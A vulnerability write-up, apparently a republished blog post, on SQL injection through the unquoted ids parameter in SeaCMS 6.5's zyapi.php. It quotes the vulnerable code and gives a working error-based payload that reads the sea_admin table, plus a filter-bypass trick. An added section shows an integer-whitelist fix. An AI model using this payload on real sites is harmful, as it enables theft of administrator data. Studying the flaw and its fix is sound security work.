• SeaCMS 6.5 injection vulnerability (1)



    Requires /data/admin/isapi.txt to be enabled: when the value in that file is 1, error-based injection becomes possible.

    Vulnerable page: zyapi.php

    function cj()
    {
    	// $ids comes straight from the request (GET) and is spliced into the SQL below without quotes.
    	global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$ids;
    	$xmla = "<?xml version=\"1.0\" encoding=\"utf-8\"?>";
    	$xmla .= "<rss version=\"".$app_apiver."\">";
    
    	$sql = "select d.*,p.body as v_playdata,p.body1 as v_playdata1,t.tname from sea_data d left join `sea_type` t on t.tid=d.tid left join `sea_playdata` p on p.v_id=d.v_id where d.v_recycled=0 ";
    	$sql1 = "select count(*) as dd from sea_data where v_recycled=0 ";
    	
    	if($ids!=""){
    		// addslashes() only escapes quotes and backslashes; inside an unquoted numeric IN (...) list it does not stop injection.
    		$ids = addslashes($ids);
    		$sql .= " AND d.v_id in (". $ids .")";
    		$sql1 .= " AND v_id in (". $ids .")";
    	}
    	// ... remainder of the function not included in the original post
    

      

    $ids is used without quotes, and it is supplied via GET.

    Payload:

    /zyapi.php?ac=videolist&ids=1%29and%0b1%3D%40%60%27%60%0band%0b%28updatexml%281%2Cconcat%23%0a%281%2C%28select%0b%7Bx+name%7D%0bfrom%0bsea_admin%29%29%2C1%29%29and%0b1%3D%40%60%27%60%0band%0b%280.1%3D0.1

    Once the query reaches the database layer there is one line that gave me a hard time; in the end I used + and %0b to bypass it. It took a lot of fiddling, so I'd better remember it next time.

    // SeaCMS DB layer: unless the query already contains "limit", strip a trailing , or ; and append " limit 0,1;"
    if(!m_eregi("limit",$sql)) $this->SetQuery(m_eregi_replace("[,;]$",'',trim($sql))." limit 0,1;");
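An added example (not SeaCMS code) contrasting the unquoted $ids pattern above with an integer whitelist that rejects the payload shape shown on this page; the function names and the constructed inputs are assumptions.

```php
<?php
// Added example, not SeaCMS code: the unquoted $ids pattern from zyapi.php
// next to a whitelisting fix. Function names are hypothetical.

// Vulnerable pattern: $ids is spliced into a numeric IN (...) list with no
// quotes, so addslashes() (which only escapes ' " \ and NUL) changes nothing
// about the SQL structure; the payload on this page needs no quote to break out.
function build_where_vulnerable(string $ids): string
{
    $ids = addslashes($ids);
    return " AND d.v_id in (" . $ids . ")";
}

// Hardened: the whole parameter must be a comma-separated list of plain
// integers; anything else (operators, comments, %0b/%0a whitespace, function
// calls) is rejected before it can reach the query string.
function sanitize_ids(string $ids): ?string
{
    if (!preg_match('/\A[0-9]{1,10}(,[0-9]{1,10})*\z/', $ids)) {
        return null;
    }
    $list = array_values(array_unique(array_map('intval', explode(',', $ids))));
    return implode(',', $list);
}

function build_where_hardened(string $ids): string
{
    $clean = sanitize_ids($ids);
    // Invalid list: add no filter (a caller may prefer to return an error instead).
    return $clean === null ? "" : " AND d.v_id in (" . $clean . ")";
}

// Constructed inputs: a normal request and the URL-decoded shape of the
// payload on this page (%0b is a vertical tab, %23%0a a comment plus newline).
$normal = "1,2,2,3";
$attack = "1)and\x0b1=@`'`\x0band\x0b(updatexml(1,concat#\n(1,(select\x0b{x name}"
        . "\x0bfrom\x0bsea_admin)),1))and\x0b1=@`'`\x0band\x0b(0.1=0.1";

var_dump(build_where_vulnerable($attack));   // the injected SQL passes straight through
var_dump(build_where_hardened($attack));     // rejected: no filter is appended
var_dump(build_where_hardened($normal));     // only a deduplicated integer list survives
```

The `m_eregi("limit", ...)` line in the DB layer is a keyword blacklist, and the post itself shows it being bypassed; validating the parameter at the source is the control to rely on.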
    

      


  • Original article: https://www.cnblogs.com/yangxiaodi/p/7010873.html